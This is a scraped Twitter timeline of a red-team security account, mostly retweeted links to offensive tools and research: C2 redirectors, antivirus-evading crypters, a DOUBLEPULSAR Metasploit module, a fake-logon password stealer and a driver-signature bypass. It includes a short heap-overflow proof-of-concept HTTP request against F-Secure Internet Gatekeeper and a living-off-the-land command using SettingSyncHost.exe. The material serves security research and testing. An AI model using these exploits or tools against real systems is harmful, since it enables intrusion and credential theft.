|
kmkz
@
kmkz_security
Grevenmacher, Luxembourg
|
|
Redteam, offensive security and fun!
|
|
|
16.259
Tweetovi
|
1.179
Pratim
|
11.714
Osobe koje vas prate
|
| Tweetovi |
| kmkz proslijedio/la je tweet | ||
|
Andrew Chiles
@AndrewChiles
|
1 min |
|
If you use the cs2modrewrite project to build your C2 redirector rules, it is now updated to support CS <=4.0 profiles (multi-variants). #specterops #redteam @joevest
github.com/threatexpress/…
|
||
|
||
| kmkz proslijedio/la je tweet | ||
|
Francesco Soncina
@phraaaaaaa
|
4. velj |
|
x0rro — A PE/ELF/MachO Crypter for x86 and x86_64 Based on Radare2
Often AVs rely on simple signatures to detect malicious software and I needed a tool in order to confirm this behavior and be able to produce a working bypass. That’s why I wrote x0rro.
iwantmore.pizza/posts/x0rro.ht… pic.twitter.com/tqNVylQiNk
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Florian Hansemann
@CyberWarship
|
15 h |
|
SpiderFoot, the most complete OSINT collection and reconnaissance tool
#infosec #pentest #OSINT #bugbounty
github.com/smicallef/spid… pic.twitter.com/Mdc1ITucJ2
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Dave Kennedy (ReL1K)
@HackingDave
|
19 h |
|
Magic Unicorn v3.8.2 released. Changes DllImport functionality for signature bypasses.
github.com/trustedsec/uni…
#TrustedSec
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Sébastien Dudek
@FlUxIuS
|
4. velj |
|
Introduction to mobile network intrusion from a mobile phone:
medium.com/mobile-stacks-… by @Gallium24, @BuuriMa, Henri, @tmakkonen, @ad_ili_rai_en and myself.
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Tom Sellers
@TomSellers
|
4. velj |
|
You can find @wvuuuuuuuuuuuuu 's DOUBLEPULSAR over RDP blog post here:
blog.rapid7.com/2020/02/04/dou…
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
|
Tom Sellers
@TomSellers
|
4. velj |
|
And his DOUBLEPULSAR over RDP #Metasploit module here:
github.com/rapid7/metaspl…
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
RIPS Technologies
@ripstech
|
6. sij |
|
#Security #learning from "Drive By RCE Exploit in Pimcore 6.2.0":
👉 Check all execcalls(), there may be left overs bypassing sanitization.
Learn more -> rips.tech/pimcore pic.twitter.com/dSpNTz9n8Q
|
||
|
|
||
|
|
kmkz
@kmkz_security
|
4. velj |
|
|
||
| kmkz proslijedio/la je tweet | ||
|
/r/netsec
@_r_netsec
|
4. velj |
|
Firefox Spidermonkey JS Engine Exploitation blog.infosectcbr.com.au/2020/01/firefo…
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Jin Wook Kim
@wugeej
|
4. velj |
|
[PoC] Heap Overflow in F-Secure Internet Gatekeeper
POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844
AAAAAAAAAAAAAAAAAAAAAAAAAAA
blog.doyensec.com/2020/02/03/hea…
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Ryan Hausknecht
@Haus3c
|
3. velj |
|
I made a PowerShell script when researching COM objects that has like 30 foreach and if loops and will search every COM object method for a keyword, e.g. finding COM objects with a method containing 'ExecuteShell'. Maybe someone else will find it useful. github.com/hausec/COMMeth…
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Marcello
@byt3bl33d3r
|
3. velj |
|
Really glad to finally get a blogpost out about this. Hopefully this is useful and gives Red Teamers ideas on how to use the BYOI concept in their own payloads. If anyone is interested in a few more follow up posts about this will gladly oblige :)
blackhillsinfosec.com/red-teamers-co…
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Henry Chen
@chybeta
|
3. velj |
|
CVE-2020-7471: SQLI in Django:
django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter.
djangoproject.com/weblog/2020/fe…
FIX: github.com/django/django/… pic.twitter.com/NljqLmin93
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Linus Henze
@LinusHenze
|
2. velj |
|
I’ve just uploaded my Jailbreak for the iPad Pro (2017) to GitHub. Right now, SSH and Sileo can be installed. Due to lack of devices, I cannot currently implement support for other devices. Feel free to create PRs if you would like to help me!
github.com/LinusHenze/Fugu
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
InfoSect
@infosectcbr
|
2. velj |
|
Pointer Compression in V8 and what it means for browser exploitation by @farazsth98 blog.infosectcbr.com.au/2020/02/pointe…
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
jack
@operat_or
|
25. sij |
|
Some notes on PoshC2, operational considerations + a couple of tweaks to default beacons which might reduce exposure to Blue team operat-or.gitbook.io/notes/poshc2-i…
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Arris Huijgen
@bitsadmin
|
1. velj |
|
#FakeLogonScreen is a C# utility to steal a user's password using a fake Windows logon screen. This password will then be validated and saved to disk. Useful in combination with #CobaltStrike's execute-assembly command.
github.com/bitsadmin/fake… pic.twitter.com/2pAOk9InLM
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
FireF0X
@hFireF0X
|
2. velj |
|
KDU, Kernel Driver Utility - driver loader (and not only) bypassing Windows x64 Driver Signature Enforcement with support of various "functionality" providers - including Unwinder's RTCore, github.com/hfiref0x/KDU pic.twitter.com/s154qYlIKR
|
||
|
|
||
| kmkz proslijedio/la je tweet | ||
|
Adam
@Hexacorn
|
2. velj |
|
SettingSyncHost.exe as a LolBin
hexacorn.com/blog/2020/02/0…
#LOLBIN
cd %TEMP% & c:\windows\system32\SettingSyncHost.exe -LoadAndRunDiagScript foo pic.twitter.com/dOM4EHq4Zu
|
||
|
|
||